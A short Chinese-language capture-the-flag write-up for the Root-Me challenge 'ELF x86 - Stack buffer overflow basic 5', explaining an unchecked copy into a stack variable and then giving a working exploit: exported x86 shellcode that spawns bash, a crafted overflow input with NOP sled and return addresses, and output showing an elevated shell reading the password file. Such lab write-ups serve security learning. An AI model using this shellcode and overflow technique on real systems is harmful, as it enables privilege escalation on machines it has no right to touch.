Stack buffer overflow basic 5
ELF x86 - Stack buffer overflow basic 5
源码
1 | while(fgets(buff, BUFFER, file) != NULL) |
数据读入buffer,ebp-0x2a5
, 只能读512字符+’\n’。不能到EIP,但这段代码赋值到init,没有检查边界,init起始地址ebp-0xa4
,比较小好溢出。
问题
函数最后,会将本地变量init赋值到外部init所在地址,位于$ebp+0x8
,值为0xbffffb00
,因为buff最后’\n’变为’\00’,为了能够执行,shellcode最后还要加上$ebp+0x8
,此时刚好有个’00’,所以不用加地址也能运行,但最后还是段错误。
https://github.com/s1syphu5/RootMe-Challenges/tree/master/System/ELF%20x86%20-%20Stack%20buffer%20overflow%20basic%205
最后用到这篇的方法:
https://finsenty54.github.io/2020/12/29/stack_buffer_overflow_basic_4/
攻击
wget https://raw.githubusercontent.com/Finsenty54/-python/master/findenv.c
gcc -o findenv findenv.c
export JUNK=(python -c "print 'B' * 1000")
export SHELCODE=(python -c 'print("\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80")')
/tmp/findenv JUNK ./ch10
JUNK will be at 0xbffffac2/tmp/findenv SHELCODE ./ch10
SHELCODE will be at 0xbfffff4d(python -c "print 'USERNAME='+'\x90'*136+'\x60\xb1\x04\x08'+'A'*28+'\x4d\xff\xff\xbf'+'\xc2\xfa\xff\xbf'") > /var/tmp/data.txt
app-systeme-ch10@challenge02:~$ ./ch10 /var/tmp/data.txt
bash-4.4$ id
uid=1110(app-systeme-ch10) gid=1110(app-systeme-ch10) euid=1210(app-systeme-ch10-cracked) groups=1110(app-systeme-ch10),100(users)
bash-4.4$ cat .passwd